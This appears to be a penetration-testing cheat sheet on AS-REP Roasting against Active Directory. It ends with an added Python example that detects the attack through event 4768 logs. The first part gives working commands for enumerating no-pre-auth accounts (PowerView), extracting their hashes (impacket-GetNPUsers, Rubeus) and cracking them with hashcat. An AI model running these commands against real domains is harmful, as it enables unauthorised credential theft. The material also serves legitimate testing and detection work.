AS-REP Roasting

First, build a list of AS-REP roastable users, that is, accounts that do not require Kerberos pre-authentication.

Get-DomainUser -PreauthNotRequired

Then use the tool that matches your platform to request the hashes.

Kali

impacket-GetNPUsers -dc-ip $DC_IP$ -request -outputfile hashes.asreproast $DOMAIN$/$USER$

Windows

.\Rubeus.exe asreproast /nowrap

Once the hash has been extracted on Kali or Windows, use hashcat to crack it.

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
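
The request step above leaves a trace on the domain controller: Security event 4768 with a pre-authentication type of 0. The following is an added example, not part of the original page, that flags such events and groups them by source host; the event dictionaries are constructed samples that use the 4768 field names, and `find_asrep_candidates` and `burst_threshold` are hypothetical names.

```python
from collections import defaultdict

# Constructed sample: Security event 4768 (TGT requested), reduced to the
# fields used here. Key names follow the event's data field names.
SAMPLE_EVENTS = [
    {"TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.21",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "svc_backup", "IpAddress": "::ffff:10.0.0.99",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "svc_print", "IpAddress": "::ffff:10.0.0.99",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "legacy_app", "IpAddress": "::ffff:10.0.0.40",
     "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0"},
    # Failed request: no ticket issued, placeholder values in the other fields.
    {"TargetUserName": "bob", "IpAddress": "::ffff:10.0.0.99",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x6"},
]

RC4_HMAC = 0x17  # etype 23, the encryption type hashcat mode 18200 handles


def find_asrep_candidates(events, burst_threshold=2):
    """Group successful no-pre-auth TGT requests by source and rate them."""
    by_source = defaultdict(list)
    for ev in events:
        if int(ev["Status"], 16) != 0:   # failures carry no ticket; skip first
            continue
        if int(ev["PreAuthType"]) != 0:  # 0 = request made without pre-auth
            continue
        by_source[ev["IpAddress"]].append(ev)

    findings = []
    for source, evs in sorted(by_source.items()):
        accounts = sorted({e["TargetUserName"] for e in evs})
        rc4 = sorted({e["TargetUserName"] for e in evs
                      if int(e["TicketEncryptionType"], 16) == RC4_HMAC})
        # Several no-pre-auth accounts from one host, answered with RC4,
        # matches the roasting pattern; a single AES request is only reviewed.
        burst = len(accounts) >= burst_threshold and bool(rc4)
        findings.append({"source": source, "accounts": accounts,
                         "rc4_accounts": rc4,
                         "severity": "high" if burst else "review"})
    return findings


if __name__ == "__main__":
    for finding in find_asrep_candidates(SAMPLE_EVENTS):
        print(finding)
```

Every account the function reports is one that `Get-DomainUser -PreauthNotRequired` would also list, so each finding doubles as a candidate for re-enabling pre-authentication.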
